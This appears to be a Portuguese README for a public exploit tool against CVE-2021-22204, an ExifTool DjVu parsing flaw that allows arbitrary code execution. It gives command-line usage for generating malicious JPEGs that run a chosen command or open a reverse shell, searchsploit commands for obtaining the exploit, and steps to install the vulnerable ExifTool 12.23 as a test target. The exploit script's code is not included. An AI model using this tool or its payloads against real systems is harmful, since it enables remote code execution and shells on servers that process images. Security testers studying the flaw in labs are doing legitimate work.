
Exploit para CVE-2021-22204 (ExifTool) - Execução Arbitrária de Código

Gostou deste repositório? Dê-nos uma ⭐!
Apenas para fins educacionais e de pesquisa de segurança autorizada.
@UNICORDev por (@NicPWNs e @Dev-Yeoj)
A neutralização inadequada de dados do usuário no formato de arquivo DjVu no ExifTool versões 7.44 e posteriores permite execução arbitrária de código ao analisar a imagem maliciosa.
Use este exploit para gerar um payload de imagem JPEG que pode ser usado com uma versão vulnerável do ExifTool para execução de código. Um comando personalizado pode ser fornecido ou um reverse shell pode ser gerado. Uma imagem JPEG é gerada automaticamente e, opcionalmente, uma imagem JPEG personalizada pode ser fornecida para que o payload seja inserido.
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
-c Custom command mode. Provide command to execute.
-s Reverse shell mode. Provide local IP and port.
-i Path to custom JPEG image. (Optional)
-h Show this help menu.
searchsploit -u
searchsploit -m 50911

Exiftool Versão 12.23
Exiftool Versões 7.44 - 12.23
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver
exiftool image.jpg